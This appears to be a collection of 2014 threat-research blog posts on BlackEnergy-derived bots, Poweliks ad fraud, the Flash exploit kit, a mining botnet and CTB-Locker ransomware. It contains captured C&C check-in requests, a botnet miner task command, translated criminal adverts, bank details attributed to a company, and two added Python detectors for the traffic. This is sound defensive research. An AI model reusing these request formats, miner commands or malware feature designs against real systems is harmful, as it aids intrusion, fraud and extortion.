
BotnetKernel (MS:Win32/Phdet.S) an evolution of BlackEnergy



I didn't find any advert for what seems to be an evolution of the BlackEnergy DDoS bot/botnet, flagged Backdoor:Win32/Phdet.S by Microsoft: the BotnetKernel bot.

Here is a C&C panel :

BotnetKernel C&C Panel : Control
BotnetKernel C&C Panel : Control - Stats by Countries
BotnetKernel C&C Panel : Control - Stats by Builds
BotnetKernel C&C Panel : Plugins
BotnetKernel C&C Panel : Plugins config : ddos

BotnetKernel C&C Panel : Plugins config : http
BotnetKernel C&C Panel : Plugins config : slow
BotnetKernel C&C Panel :bot list
BotnetKernel C&C Panel :bot list - Search (FR) - Cmd and Cfg on a bot
A sample (7626a97642e27b13d2d8a021661099f7) I came across was pushed as a task by an Andromeda botnet (yes, the same Andromeda botnet that was pushing the Neutrino bot).

Sandboxing it :


Force reboot captured by Cuckoo Sandbox
Dropped:
C:\WINDOWS\system32\drivers\nethost.sys - f4827d3fc17af67f390b59f5ed04622c
C:\WINDOWS\system32\DLL1.tmp

Traffic (pcap at the end) :

http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 101
Cache-Control: no-cache

hyrf=ZcHUXPhRjZgrcaXeLjNBeXq7YXPCO+9rXBJeQ53QARj24lQoxyWAfjRknTKsWfo2eDIxWwz2Feb+IjnjkAEG88MaS4L01pSq
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 118
Cache-Control: no-cache

nslaf=a8Cdb/EG37VtEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 116
Cache-Control: no-cache

zkn=a8Cdb/EKz65uEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 116
Cache-Control: no-cache

oeh=a8Cdb/ER17VpEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
which fires these ET Pro rules in Suricata:

06/21/2014-03:45:49.765657 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1072 -> 91.194.254.180:80
06/21/2014-03:45:47.325018 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 91.194.254.180:80
06/21/2014-03:45:48.563590 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1071 -> 91.194.254.180:80
Files: multiple BotnetKernel bot samples, pcap, dropped driver.
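As an added example (my own code, not from the original post or the bot), here is a Python classifier for the check-in shape seen above: a POST to getcfg.php whose single form parameter has a random short name (hyrf, nslaf, zkn, oeh) and a base64 value. The two bot requests are reconstructed from the captured ones; the benign login POST is made up for contrast.

```python
import base64
import binascii
import re
from typing import Any, Dict, List, Optional

# Constructed sample traffic: the two bot requests reuse the captured getcfg.php check-ins
# above (one per parameter-name variant); the benign login POST is made up for contrast.
BOT_CHECKINS = [
    "POST /ya/getcfg.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)\r\n"
    "Host: nav555asto.mcdir.ru\r\n"
    "Content-Length: 101\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "hyrf=ZcHUXPhRjZgrcaXeLjNBeXq7YXPCO+9rXBJeQ53QARj24lQoxyWAfjRknTKsWfo2eDIxWwz2Feb+IjnjkAEG88MaS4L01pSq",
    "POST /ya/getcfg.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)\r\n"
    "Host: nav555asto.mcdir.ru\r\n"
    "Content-Length: 116\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "zkn=a8Cdb/EKz65uEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==",
]
BENIGN_POST = (
    "POST /login HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: intranet.example\r\n"
    "Content-Length: 27\r\n"
    "\r\n"
    "user=alice&password=hunter2"
)

# One parameter, short lower-case name, base64 value: the bot picks a fresh parameter
# name per request (hyrf, nslaf, zkn, oeh), so the detection keys on the shape, not the name.
SINGLE_B64_PARAM = re.compile(r"^([a-z]{3,6})=([A-Za-z0-9+/]+={0,2})$")


def parse_request(raw: str) -> Dict[str, Any]:
    """Minimal HTTP/1.x request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify_checkin(raw: str) -> Optional[Dict[str, Any]]:
    """Return check-in details if the request matches the BotnetKernel pattern, else None."""
    req = parse_request(raw)
    headers = req["headers"]
    if req["method"] != "POST" or not req["path"].endswith("/getcfg.php"):
        return None
    if headers.get("content-type") != "application/x-www-form-urlencoded":
        return None
    if "MSIE 6.0" not in headers.get("user-agent", ""):
        return None
    # The bot sets Content-Length to the exact body size; a mismatch means another client.
    if headers.get("content-length") != str(len(req["body"])):
        return None
    match = SINGLE_B64_PARAM.match(req["body"])
    if not match or len(match.group(2)) % 4:
        return None
    try:
        blob = base64.b64decode(match.group(2))
    except binascii.Error:
        return None
    if len(blob) < 64:  # observed payloads are 72 and 82 bytes; ignore tiny bodies
        return None
    return {"host": headers.get("host"), "param": match.group(1), "decoded_len": len(blob)}


def scan(requests: List[str]) -> List[Dict[str, Any]]:
    """Run the classifier over a batch of raw requests, keeping only the matches."""
    hits = []
    for raw in requests:
        hit = classify_checkin(raw)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(BOT_CHECKINS + [BENIGN_POST]):
        print(hit)
```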

Read more :
BlackEnergy Rootkit, Sort Of - 2014-06-13 - F-Secure
Nueva variante del rootkit Phdet.s de dificil deteciòn !!! - 2014-03-04 - SatInfo
MSRT December '12 - Phdet - 2012-12-11 - Scott Molenkamp - Microsoft
BlackEnergy Version 2 Analysis - 2010-03-10 - Joe Stewart - Dell Secureworks
Updated BlackEnergy DDos Botnet Kit - 2010-01-18 Dell
BlackEnergy DDoS Bot Analysis (PDF) - 2007-10 - Jose Nazario - Arbor.sert

From Alureon/Wowliks to Poweliks botnet (distribution in Affiliate mode)



At the beginning of February 2014, a sample pushed via Sweet Orange caught my attention:

Alureon(MS)/wowliks(Eset) pushed in Sweet Orange
2014-02-03
[OT]:
The same Sweet Orange thread operator (meaning the same account/actor on Sweet Orange) was also pushing Qadars (e.g. d7c1414939dc0956445835cc67187868) and an Andromeda (e.g. f757d0ce1bfcca3111e9060a6823b936 - exolocity.info [**] /andro/image.php -> 5.10.69.232:80).
[/OT]

The sample (61bdea52b821c04cb65237c345d2b7dc), later tagged Trojan:Win32/Alureon.GQ by Microsoft, was showing affiliate ID 427 (the connection with an advert on the underground has not been made so far).

Calls were like:
http://cc9966 .com/log?install|aid=427|version=1.5|id=e87ff15a-a56a-42f5-b69b-503c6d3bf908|os=5.1.2600_3.0_32
http://cc9966 .com/cmd?version=1.5&aid=427&id=e87ff15a-a56a-42f5-b69b-503c6d3bf908&os=5.1.2600_3.0_32
http://cc9966 .com/log?exist_2_c0000035|aid=427|version=1.5|id=e87ff15a-a56a-42f5-b69b-503c6d3bf908|os=5.1.2600_3.0_32

You can find its analysis by Malwr.com here.
Unpacked by Horgh here, and another one here.

Another example in May: a different exploit kit, domain and affiliate ID, but the same botnet instance:

2014-05-22 - Angler EK via BlackOS (formerly Tales of the North Iframer aka Cookie Bomb) compromise

Payload : 21b2767f6da96c7e32c00b864ec5f03c

wow.ini dropped in the VM


05/22/2014-16:13:35.041044 f5f5dc.com [**] /log?start|aid=103|version=1.5|id=f66896c4-a2e2-4bba-a564-6242c3f778a6|os=5.1.2600_2.0_32 [**] <useragent unknown> [**] <no referer> [**] GET [**] HTTP/1.0 [**] 200 [**] 0 bytes [**] 192.168.1.31:1066 -> 31.184.192.196:80




But lately the affiliate seems to be spreading something different.

(2014-06-30) in Magnitude:

Poweliks.A pushed in Magnitude


Payload : c42ff115afabb81a979b51b15621f088 
Unpacked by Horgh here, and the DLL uncompressed.

The first set of post-infection calls has changed and now looks like:

06/30/2014-05:22:20.148052 cd5c5c.com [**] /q [**] <useragent unknown> [**] <no referer> [**] POST [**] HTTP/1.0 [**] 200 [**] 0 bytes [**] 192.168.1.31:1066 -> 31.184.192.202:80

06/30/2014-05:22:23.244452 download.microsoft.com [**] /download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe [**] Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 318224 bytes [**] 192.168.1.31:1069 -> 96.7.41.136:80

Note that it fetches Microsoft .NET Framework 2.0 SP1 (x86) and later KB968930 (which includes PowerShell 2.0 and, by the way, requires SP3 on Windows XP).

Firing these ET Pro rules in Suricata:

06/30/2014-05:22:20.148052 [**] [1:2808248:2] ETPRO TROJAN Win32/Poweliks.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1066 -> 31.184.192.202:80
06/30/2014-05:22:20.840616 [**] [1:2000419:22] ET POLICY PE EXE or DLL Windows file download [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 96.7.41.136:80 -> 192.168.1.31:1069
06/30/2014-05:22:21.124879 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 96.7.41.136:80 -> 192.168.1.31:1069

Poweliks.A is a name given by Eset.

Wowliks and Poweliks share a lot of code.
Some code snippet comparison (courtesy of Horgh)
They also have very similar callbacks to the C&C:

Wowliks:
http://%s/log?%s|aid=%s|version=1.5|id=%s|os=%s_%s
Poweliks:
type=%s&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s
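As an added example (my own code, not Horgh's and not the bot's), here is a Python parser that normalises both callback formats, and the Suricata http.log-style lines shown above, into one record shape so reports from both families can be grouped by affiliate ID. The Wowliks log line and /cmd URI reuse the captured requests; the Poweliks POST body and its bot id are constructed to match the format string, since the capture above does not show that body.

```python
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample input. The Wowliks log line and /cmd URI reuse the requests captured
# above; the Poweliks POST body is made up to match the format string (the capture shows
# the /q request but not its body) and carries a placeholder bot id.
WOWLIKS_LOG_LINE = (
    "05/22/2014-16:13:35.041044 f5f5dc.com [**] /log?start|aid=103|version=1.5"
    "|id=f66896c4-a2e2-4bba-a564-6242c3f778a6|os=5.1.2600_2.0_32 [**] <useragent unknown>"
    " [**] <no referer> [**] GET [**] HTTP/1.0 [**] 200 [**] 0 bytes"
    " [**] 192.168.1.31:1066 -> 31.184.192.196:80"
)
WOWLIKS_CMD_URI = ("/cmd?version=1.5&aid=427&id=e87ff15a-a56a-42f5-b69b-503c6d3bf908"
                   "&os=5.1.2600_3.0_32")
POWELIKS_BODY = ("type=start&version=1.0&aid=103&builddate=20140630"
                 "&id=00000000-0000-4000-8000-00000000c0de&os=5.1.2600_2.0_32")

WOWLIKS_FIELDS = {"aid", "version", "id", "os"}
POWELIKS_FIELDS = {"type", "version", "aid", "builddate", "id", "os"}


def parse_http_log_line(line: str) -> Dict[str, str]:
    """Split a Suricata http.log line (fields separated by ' [**] ') into a dict."""
    fields = line.split(" [**] ")
    if len(fields) != 9:
        raise ValueError("unexpected http.log layout: %d fields" % len(fields))
    timestamp, host = fields[0].split(" ", 1)
    keys = ["uri", "user_agent", "referer", "method", "proto", "status", "size", "conn"]
    record = dict(zip(keys, fields[1:]))
    record.update(timestamp=timestamp, host=host)
    return record


def _kv_pairs(text: str, sep: str) -> Dict[str, str]:
    """Parse 'k=v<sep>k=v' into a dict; items without '=' are ignored."""
    pairs = {}
    for item in text.split(sep):
        key, eq, value = item.partition("=")
        if eq:
            pairs[key] = value
    return pairs


def _normalize(family: str, event: str, kv: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Common record shape for both families; arch is the last '_' part of the os field."""
    return {
        "family": family,
        "event": event,
        "aid": kv["aid"],
        "version": kv["version"],
        "bot_id": kv["id"],
        "os": kv["os"],
        "arch": kv["os"].rsplit("_", 1)[-1],
        "builddate": kv.get("builddate"),
    }


def parse_wowliks_uri(uri: str) -> Optional[Dict[str, Optional[str]]]:
    """Wowliks: /log?<event>|aid=..|version=1.5|id=..|os=..  or  /cmd?version=..&aid=..&id=..&os=.."""
    path, _, query = uri.partition("?")
    if path == "/log":
        event, _, rest = query.partition("|")   # the event name precedes the first '|'
        kv = _kv_pairs(rest, "|")
    elif path == "/cmd":
        event, kv = "cmd", _kv_pairs(query, "&")
    else:
        return None
    if not WOWLIKS_FIELDS.issubset(kv):
        return None
    return _normalize("wowliks", event, kv)


def parse_poweliks_body(body: str) -> Optional[Dict[str, Optional[str]]]:
    """Poweliks: type=..&version=1.0&aid=..&builddate=..&id=..&os=.. (POST body)."""
    kv = _kv_pairs(body, "&")
    if not POWELIKS_FIELDS.issubset(kv):
        return None
    return _normalize("poweliks", kv["type"], kv)


def families_by_affiliate(records: List[Dict[str, Optional[str]]]) -> Dict[str, List[str]]:
    """Group parsed callbacks by affiliate id: which families report under each aid."""
    seen = defaultdict(set)
    for rec in records:
        seen[rec["aid"]].add(rec["family"])
    return {aid: sorted(fams) for aid, fams in seen.items()}


if __name__ == "__main__":
    log = parse_http_log_line(WOWLIKS_LOG_LINE)
    records = [parse_wowliks_uri(log["uri"]), parse_wowliks_uri(WOWLIKS_CMD_URI),
               parse_poweliks_body(POWELIKS_BODY)]
    for rec in records:
        print(rec)
    print(families_by_affiliate(records))
```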


As we might expect, Poweliks integrates some PowerShell scripts.


Base64 chain in the PowerShell scripts in Poweliks (leading to an MPRESS-compressed DLL)
http://pastebin.com/REdC5nB6
http://pastebin.com/SP1nHsT5
Despite slightly more complete network calls, Poweliks does not look like an evolution but more like a downgraded fork... It is less resilient and has no x64 components. Hard to understand such a move.


Now here is a look at the C&C side (February/March 2014) :

Botnet Size (around 30k active nodes) and daily new bots for a week in February
Income for a Week in February (all Affiliates)
Not far from 60k
Showing some AIDs
Showing the version available in February
The operation on that botnet seems to have started at the beginning of November.
How much money have they made since then? At least 721k (this is not speculation: only 14k two months ago and 12k the previous month, versus 244k in February with one feed provider).
Note:
They may have changed account within the same feed provider, or changed feed provider, and hence have made far more.

Where is (was?) the feed/money coming from ?

IntecPPC.

Feed provider for this AdFraud botnet


Feed information
so the money should come from this bank account (in February; this is the data you get when you register there):

Beneficiary: Loyal Bank Limited
Beneficiary Account: RO81FNNB009502959442US01 USD
Beneficiary Bank: Credit Europe Bank (Romania) SA
Beneficiary Bank SWIFT: FNNBROBU
Bank Address: Bucharest, Romania
Beneficiary Address: Cedar Hill Crest, Villa, St. Vincent and the Grenadines
Payment details: In f/o Beneficiary Acc.no. 104011281407840 to the Beneficiary Name IntecPPC Ltd. and address Suite 101, 1885 Driftwood bay, Belize city, Belize. Payment for clicks on advertisements(traffic)

- our company name IntecPPC Ltd. (with "." in the end)
- our company address: Suite 101, 1885 Driftwood bay, Belize city, Belize


In June 2013 the account for IntecPPC was:

All further payments should be sent to the following wire details:
Beneficiary: IntecPPC Ltd.
Beneficiary Account: 104011281407840 USD
Beneficiary Bank: Loyal Bank Limited
Beneficiary Bank SWIFT: LOYAVCVX
Bank Address:
Cedar Hill Crest, Villa, St. Vincent and the Grenadines
Beneficiary Address:
Suite 305, Marina Towers, Newtown Barracks,
Belize city, Belize

Street View for
Marina Towers, Newtown Barracks, Belize City, Belize



Note: maybe IntecPPC is being abused and the end customers of their advertisers are the victims here... or, to think darker, maybe this is a complex money laundering scheme.
There is a "bot activity" detection implemented, but less than 0.1% of the botnet traffic was flagged that way.

Credits: Thanks a lot Horgh for the time spent dissecting those samples.
Files : Fiddler/Pcap and some samples.

Bye Bye Flash EK ? (and Windigo group adapting)



Some days ago, researchers closely following the exploit kit landscape started to notice some problems with Flash EK (AFAIK first noticed by Will Metcalf from Emerging Threats).

A few days later, one of its two customers posted a message on the underground asking for news...

Now the main customer (Windigo/Glupteba/ExTKR) has transitioned to RIG.

Here is an image to sum this up:

The Windigo/Ebury group reacting to Flash EK problems and pushing Glupteba in RIG
(after migrating from Neutrino - 2014-03 - and previously from Blackhole - 2013-10)
Note: for those following Flash EK, "codex" should sound familiar :)


Flash EK (aka Flash Pack) was a fork or descendant of SafePack, itself a fork or descendant of CritXPack (formerly Vintage Pack) (<-- yes, if you stop following the moves, you get lost).

Here is the advert for Flash EK :

Original advert - 2013-12-19 (translated from Russian)
------------------------------------------
This offer is primarily for those who value their traffic sources.

In addition to this thread:
It is now possible to serve the bundle in a frame generated by the banner.
The bundle has been tested and refined over a long time.
The bundle contains six exploits:
- 3 Java, up to 1.7.21 inclusive
- "ledyboye"
- "dashstyle"
- silver
The admin panel supports automatic domain rotation, checking the domain and the file for detection, and loading the file on a cron schedule.
Traffic is accepted only through the banner, but there are no limits.
The banner:
- filters out non-exploitable OSes and browsers
- sets a Flash cookie for 24 hours; if the cookie is already there, it is filtered out, and if it cannot be set, it is a bot
- filters by screen resolution
Everything else goes to the bundle.
For now the bundle loads only EXEs; DLL support is being worked on.
The price of one banner with unlimited traffic on one stream, with the ability to load one file, is 250 USD per week.
Payment in bitcoins at the current rate.
The cost of cleaning the banner is included in the rental price.
Test: a banner for 25 USD for one panel for 24 hours.
CIS traffic is sent to Disney.

Jabber: confessor@sj.ms
Support contact via Jabber.
OTR and a link to your profile on Exploit are mandatory.
I still don't understand "Olbanian", English or Google Translate.

PS: Working for a percentage of the traffic is possible: 10 percent, volumes from 100k per day.
------------------------------------------


Update in March (translated from Russian):
------------------------------------------
There is now room for another five to ten tenants on the bundle.
Feeding traffic through the banner is preferred but not mandatory; a standard rotator has been bolted on.
Seven exploits. Silly questions about CVEs are ignored.
Traffic: unlimited; streams: five.
File check and current domain check from the admin panel.
One stream: 250 per week; five: 750.
For a test you need a proxying VPS running nginx and your own domains.
If you don't know what nginx or domains are, don't message me.
CIS traffic is not accepted.
Details over Jabber. OTR only.
Support is "coded" (sworn off drinking); we are not planning a 400-seat orgy. Infection rate at a decent level. Regular cleanings.
There is always side work for Java coders.
I don't understand English. I don't deal with schoolkids. I reserve the right to refuse cooperation for subjective reasons.
---Later
2014-0322
2013-0074
2013-0634
2013-2551
2013-2471
2013-2465
2011-3544
------------------------------------------

Recent move :


How did the panel look?

Flash EK - 2014-05-26

Another one showing the referer and country part when activated:

Flash EK 2014-04-16
So... some think Paunch and Conf are now talking together about the good old days... Maybe we'll hear about it, he'll come back, or Conf will disappear quietly as Xio (Sakura) and Serv2u (Neutrino) did...
(I have to admit it again: I know it's bad, but each time an EK disappears I feel a little sad...)
--Edit1 2014-07-11 --
Conf replied on Underground :

I spilled something on my laptop keyboard
That's the whole problem

(translation soon. Seems to be tied to a laptop problem)
------

Read More :
Operation Windigo (PDF) - 2014-03 - Eset
Meet Safe Pack (v2.0)... Again :) - 2013-04-21
Meet CritXPack (Previously Vintage Pack) - 2012-11-12

SkyShare : Evolution Mining Botnet System



At the beginning of the year, an advert for a mining botnet appeared on the underground:

Piece of the Advert on the Underground

Original text of the advert (translated from Russian):
------------------------------------------
I offer a stable, automated system for mining on bots.
Short description: a complete turnkey system for long-term, stable mining.
Supported currencies: quark (recommended) / scrypt.

Main features:

Drop-system: the miner is installed automatically on the infected machine right after the loader is pushed (size: only 13 KB)

Panel: a convenient panel for controlling the bots; you can view statistics and coin exchange rates, push third-party software to the bots, and much more. Besides the basic functions, the panel includes a stealer and a form grabber, to get maximum income from the bots.

AutoPool: we give every client a convenient panel for mining currencies on our pools, with the ability to switch hashing power to the most profitable one at any moment! Only for quark currencies: qrk, src, frq, fz, c-note, wiki (the list will be extended as new currencies appear on the exchanges)

This update solves the following problems:
1) loss of income due to a falling exchange rate / rising difficulty
2) a ban of the bot control panel (the loader), when you lose the ability to control the bots
3) pool unavailability / bans on pools

CPUMaxProfit: we mine quark! Now you get maximum profit from every bot without losing stable earnings! Our software supports all available quark currencies traded on the market: qrk, src, frq, fz, c-note and wikicoin!

All Windows versions are supported: where previously quark could not be mined on Windows versions below Windows 7, now it is possible! Operation is guaranteed on either bitness, 32 or 64-bit, and on any computer configuration! And where income from 32-bit machines used to drop substantially, now the difference is minimal!

Anti-AV system: the miner has a self-restore function after removal; in 7 out of 10 cases where the miner is removed by an antivirus / by hand, it will be restored in the system after a reboot and continue its work!

Also, on delivery the miner build is detected by a minimal number of antiviruses, most of which are unpopular. Active work is being done on improving FUD. The miner is easy to crypt; if needed we will give you contacts of crypting services where you can get a discount for crypting our product (they work almost 24/7)
UAC bypass included!

Mining Community: owners of our miner get access to a community where all the latest news about the software is discussed, and where you can propose your own ideas for developing the project.

Stability: over the last 3 months of operation we have lost no more than 10% of the hashrate relative to the total coins produced, and I can safely say that the miners live for months (and maybe years :)

Bulletproof: each system is hosted on powerful server hardware able to handle hundreds of thousands of bots. Bulletproof domains are bound to the proxy / loader, and on top of the system there is proxying via FastFlux technology, thanks to which you need not fear for your safety while working with the system!

Supported coins: our bot supports any coin on the quark / scrypt algorithms (litecoin, dogecoin, securecoin and others). At the moment the system is aimed at mining quark coins specifically. Why those? Read the FAQ below. But if you want to mine scrypt coins, no problem; the only difference is that we are not developing an autopool for them yet, so you will have to choose the pool you mine to (or support will suggest a current pool for your currency).

Pricing:
Subscription only (given the complexity of the system):

$750 for the first month, $400 for subsequent months.

The price includes: 2 panels (loader and miner), the dropper EXE, the miner EXEs, and continuous updates.

Frequent promotions and discounts from us and our partners!

Payment in any currency convenient for you, from W1, Yandex Money, WM, Perfect, QIWI to any current cryptocoin!

Frequently asked questions:

- Do you work through an escrow (guarantor)?
- We do.

- Why rental?
- Because the system requires fine tuning and our server is very finely tuned for this setup; also, we do not approve of leaks to the public.

- Do I need to crypt constantly?
- The loader: if you want the bots to stay alive longer, then yes, you should regularly refresh the crypt on the bots (an "update" task to current bots); the miners only need crypting before being pushed, after that they work independently of the dropper.

- How long do miners live on systems?
- Months.

- Do you provide installs?
- Not right now; when we start, we will definitely announce it. Any mix is fine for mining, whether CIS, Asia, Europe or the USA.

- Why quark? The algorithm is unpopular and the rates are low!
- There are several reasons for this choice:
1) The difficulty barely changes, so you will keep getting as many coins as you have been getting all along.
2) The algorithm is optimized for CPUs, so ASICs will not appear and the rates / difficulty will not collapse, as is currently happening with scrypt currencies
3) Mining is possible on absolutely any machine configuration.
4) Deep optimization has been done, and the pool servers now handle huge hashrates from botnets; the server farm can also be expanded quickly to absorb the maximum share of the coins produced in the whole network.
5) Regarding exchange rates, work is in progress; within a month we will show you something cool ;)

- How much can your pools handle? I have a fleet of 100k bots!
- They will handle 100k, and many times more. We provide several streams for convenient management of your hashrates.

- I don't want to mine quark, I want to mine doge or lite or any other scrypt coin!
- No problem; we will keep supporting the scrypt version of the miner as before, but we are not planning to build an autopool for it, nor to set up pools.


For all questions, contact our support:
jid: ph0enix@armada.im
icq: 498758324

For technical questions, miner owners should write to jid: xiii@armada.im
------------------------------------------


Thanks again to an independent researcher from Russia who shared some referers leading to what looks like a TDS, I came across an infection chain that was new to me.


3 TDS calls, then Nuclear Pack pushing 2 samples

The .ok call was triggered on mouse move :

killbot function in the redirector
Not sure how many bots would be stopped by this...
Two Payloads :


Here are some requests from that Andromeda:

http://yaybit.net/0x0x/image.php
POST /0x0x/image.php HTTP/1.1
Host: yaybit.net
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
And the ET Open rules fired in Suricata:

06/24/2014-01:45:07.423116 [**] [1:2404163:3496] ET CNC Zeus Tracker Reported CnC Server group 14 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80
06/24/2014-01:45:07.877385 [**] [1:2003492:16] ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80
06/24/2014-01:45:08.566311 [**] [1:2016223:8] ET TROJAN Andromeda Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80
A look at the C&C:

Binaries don't lie :) We have an Andromeda 2.06 forked panel,
surely based on the leaked version.
2014-06-24 - 57k bots


Meaningful background :)

Sky Share version (bottom right of the Panel)
The botnet was growing really fast: 57k in one week, then one week of rest and a jump in one day to 72k bots in total (including dead ones).

2014-07-01 - 72k bots


Geo distribution:

That Sky Share geo distribution - 2014-06-24

Tasks List (the miner)
8d07b2d0062bfc7e4c7b8052e0a17646 (32) and cc560f5a630ee48365517125c173a94d (64)

minerd.exe -a scrypt -o stratum+tcp://zerofloor.net:16166 -u 16166 -p x


In the stats it's just the current values of the main cryptocurrencies.

The stealer part was not operational on that one, but here is how it looks.



The Andromeda form grabber:

RU/UA focused RegExp


Someone was selling this kind of setup on the underground (translated from Russian):

------------------------------------------
An Andromeda-based loader pushes the miner EXE.
Botnet of 27k bots available (bots from the last 24 hours).

I will hand over everything that came with the license: the uncrypted loader file, two miner EXEs (for 32- and 64-bit OS), a stealer/grabber of browser passwords plus a bitcoin wallet grabber, access to the loader plus stats of active miners (the loader is hosted on FastFlex by the miner's owners, so no need to worry about abuse reports and hosting).
License + a_decent_fleet_of_bots = $2300.

URGENT, PM me for contact details if interested.

Reason for sale: urgently need money.

------------------------------------------

The author did not reply to questions about the income... but we can guess it was not that huge.

So. Bummer. Andromeda and a stratum coin miner. I like this post as little as I liked the "Silence Exploit Kit" one.

Fiddler : NuclearPack_Andro_Tofsee_2014-06-24

"Crypto Ransomware" CTB-Locker (Critroni.A) on the rise

Critroni.A


Advertised on underground forums since mid-June, CTB-Locker (Curve-Tor-Bitcoin Locker) is flagged as Critroni.A by Microsoft. In the second half of June it seems to have been used mainly against Russian users; it now seems more widely used.

Text of the advert (translated from Russian):
------------------------------------------
CTB-Locker, a new-generation cryptolocker

Advantages:
• Strong cryptography based on elliptic curves. Decrypting the files without paying is impossible. Strength equivalent to RSA-3072, which exceeds all competitors, while the encryption speed is much higher.
• All keys are one-time and cannot be collected into a database. Keys are completely random, collisions are impossible. With competitors the keys are hardcoded in the locker or on the server and can be collected.
• The server is hosted in an onion domain (TOR): the domain cannot be taken down by abuse report, and it is practically impossible to trace the owner and shut down the server.
• Connection to the server only after all files have been encrypted. Early detection by traffic is impossible, and the locker's work cannot be blocked. Blocking TOR only prevents the user from paying, not the program. Competitors connect to the server before encrypting and can be blocked.
• Payment in BTC. The wallet cannot be blocked or seized. Money is not stored on the server. Loss of the server does not mean loss of money.
• Payment from another computer is possible. Payment codes are relatively short (about 150 characters) and can be copied onto paper. Competitors do not offer offline payment, or not as simply.
• Installation and auto-configuration of the whole server from scratch in one minute with the installer! Once started, the server needs no administration.
• Built-in support for affiliate schemes.
• Locker size under 700 KB including all libraries and graphics. Nothing is downloaded.
CTB stands for the key advantages: Curve-Tor-Bitcoin

On request:
• Integration of exchangers into the payment interface.
• Replacement of the texts and graphics in the locker interface, adaptation to other languages (currently the locker is English only).
How the locker works:
• 1. The EXE is run on the user's machine. User privileges are sufficient.
• 2. A random encryption key is generated. Only the public key is kept on the machine and in RAM. The files cannot be decrypted with it.
• 3. All accessible files with the specified extensions are encrypted. All hard and removable drives and all network shares are checked.
• 4. On reboot the operation resumes from the last file.
• 5. After all files are processed, a window is shown to the user describing his problem and the payment scheme.
• 6. A request is made to the server and the encrypted key is transmitted. Or the user is told the server address and a special code with which he can pay manually.
• 7. In response the server generates a Bitcoin address to which payment must be made. The address is unique for each user, and payment is tracked by that address.
